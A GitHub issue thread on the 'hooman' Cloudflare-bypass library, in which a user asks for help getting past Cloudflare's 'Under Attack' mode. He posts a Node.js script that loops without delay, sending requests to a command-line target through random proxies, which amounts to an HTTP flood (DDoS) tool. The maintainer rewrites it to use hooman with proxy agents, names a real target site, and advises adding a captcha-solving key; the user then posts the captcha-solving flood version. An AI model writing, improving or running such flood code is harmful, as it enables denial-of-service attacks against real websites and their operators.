### ISSUE TITLE
[Help] Improve to Hooman

### ISSUE THREAD

**Issue by Danny1994d** [sayem314/hooman#14]
#### What would you like to discuss?

Need help to improve my code to bypass uam, if is posible
have tried like

hooman.get({
url: url,
agent: {
        https: proxy,
      },
      cloudflareRetry: 5,
    })
      .catch((error) => {
        console.log(response.body);

but i get error
This is my code

```js
var requestModule = require('request');
var jar = requestModule.jar();
var fs = require('fs');
var proxies = fs.readFileSync(process.argv[4], 'utf-8').replace(/\r/g, '').split('\n');

var request      = requestModule.defaults({jar: jar});

class Request {
    constructor() {
    }
    http(method, url, proxy) {
            requestModule({
                method: method,
                url: url,
                headers: { // headers ...
                'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                'accept-encoding': 'gzip, deflate, br',
                'accept-language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6,la;q=0.5',
                'cache-control': 'no-cache',
                'pragma': 'no-cache',
                'referer': url,
                'upgrade-insecure-requests': 1
                },
                proxy: 'http://' + proxy
            }, function(err, response, body) {
            });
        }
}

setTimeout(() => {
    process.exit(1);
}, process.argv[3] * 1000);

setInterval(() => {
 new Request().http(process.argv[5], process.argv[2], proxies[Math.floor(Math.random() * proxies.length)]);
});
```

#### Checklist

- [ ] I have read the hooman and got documentation.

**Comment by sayem314** [comment]
You should take your time and read the docs.

```js
const hooman = require("hooman");
const HttpsProxyAgent = require("https-proxy-agent");

class Request {
  constructor() {}
  http(method, url, proxy) {
    hooman({
      method: method,
      url: url,
      headers: {
        // headers ...
        accept:
          "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "accept-encoding": "gzip, deflate, br",
        "accept-language":
          "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6,la;q=0.5",
        "cache-control": "no-cache",
        pragma: "no-cache",
        referer: url,
        "upgrade-insecure-requests": 1
      },
      agent: {
        https: new HttpsProxyAgent("http://" + proxy)
      }
    })
      .then(response => {
        console.log(response.body);
      })
      .catch(err => {
        console.log(err.message);
      });
  }
}
```

**Comment by sayem314** [comment]
What error do you get? Site URL?

```js
const hooman = require("hooman");
const HttpsProxyAgent = require("https-proxy-agent");

class Request {
  constructor() {}
  http(method, url, proxy) {
    hooman({
      method: method,
      url: url,
      headers: {
        // headers ...
        accept:
          "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "accept-encoding": "gzip, deflate, br",
        "accept-language":
          "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6,la;q=0.5",
        "cache-control": "no-cache",
        pragma: "no-cache",
        referer: url,
        "upgrade-insecure-requests": 1
      },
      agent: {
        https: new HttpsProxyAgent("http://" + proxy)
      }
    })
      .then(response => {
        console.log(response.body);
      })
      .catch(err => {
        console.log(err.message);
      });
  }
}
```

**Comment by Danny1994d** [comment]
> You should take your time and read the docs.
> 
> ```js
> const hooman = require("hooman");
> const HttpsProxyAgent = require("https-proxy-agent");
> 
> class Request {
>   constructor() {}
>   http(method, url, proxy) {
>     hooman({
>       method: method,
>       url: url,
>       headers: {
>         // headers ...
>         accept:
>           "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
>         "accept-encoding": "gzip, deflate, br",
>         "accept-language":
>           "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6,la;q=0.5",
>         "cache-control": "no-cache",
>         pragma: "no-cache",
>         referer: url,
>         "upgrade-insecure-requests": 1
>       },
>       agent: {
>         https: new HttpsProxyAgent("http://" + proxy)
>       }
>     })
>       .then(response => {
>         console.log(response.body);
>       })
>       .catch(err => {
>         console.log(err.message);
>       });
>   }
> }
> ```

```js
(node:30335) UnhandledPromiseRejectionWarning: RequestError: Socket is closed
    at ClientRequest.<anonymous> (/root/node_modules/got/dist/source/core/index.js:792:25)
    at Object.onceWrapper (events.js:422:26)
    at ClientRequest.emit (events.js:327:22)
    at ClientRequest.origin.emit (/root/node_modules/@szmarczak/http-timer/dist/source/index.js:39:20)
    at Socket.socketErrorListener (_http_client.js:463:9)
    at Socket.emit (events.js:315:20)
    at emitErrorNT (internal/streams/destroy.js:100:8)
    at errorOrDestroy (internal/streams/destroy.js:158:7)
    at onwriteError (_stream_writable.js:392:3)
    at processTicksAndRejections (internal/process/task_queues.js:86:21)
    at Socket._writeGeneric (net.js:773:8)
    at Socket._write (net.js:795:8)
    at doWrite (_stream_writable.js:378:12)
    at clearBuffer (_stream_writable.js:518:7)
    at Socket.Writable.uncork (_stream_writable.js:318:7)
    at ClientRequest._flushOutput (_http_outgoing.js:883:10)
    at ClientRequest._flush (_http_outgoing.js:852:22)
    at _http_client.js:323:47
    at callSocketMethod (_http_client.js:811:7)
    at ClientRequest.onSocket (_http_client.js:816:7)
(node:30335) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). To terminate the node process on unhandled promise rejection, use the CLI flag `--unhandled-rejections=strict` (see https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode). (rejection id: 113)
Response code 403 (Forbidden)
```
SITE URL : https://musor.cash/

**Comment by sayem314** [comment]
The site worked for me. They throw captcha so you need to provide your `captchaKey`.

**Comment by Danny1994d** [comment]
> The site worked for me. They throw captcha so you need to provide your `captchaKey`.

we have added captcha first has working but have made some changes or idk, and now just waiting, say  [info] Solving hcaptcha at domain name, and im waiting 3 mins and nothing

```js
class Request {
  constructor() {}
  http(method, url) {
    hooman.get({
    captchaKey: 'key-captcha',
      url: url,
      method: method,
      rejectUnauthorized: false,
      headers: {
        // headers ...
        accept:
        "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*;q=0.8,application/signed-exchange;v=b3",
        "accept-encoding": "gzip, deflate, br",
        "accept-language": "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,uk;q=0.6,la;q=0.5",
        "cache-control": "no-cache",
        "upgrade-insecure-requests": 1
      },

    })
      .then(response => {
      })
      .catch(error => {
      console.log(response.body);
      });
  }
}

setTimeout(() => {
    process.exit(1);
}, process.argv[3] * 1000);

setInterval(() => {
 new Request().http(process.argv[5], process.argv[2]);
});

**Comment by EloB** [comment]
@sayem314 How do you know what is your captcha?
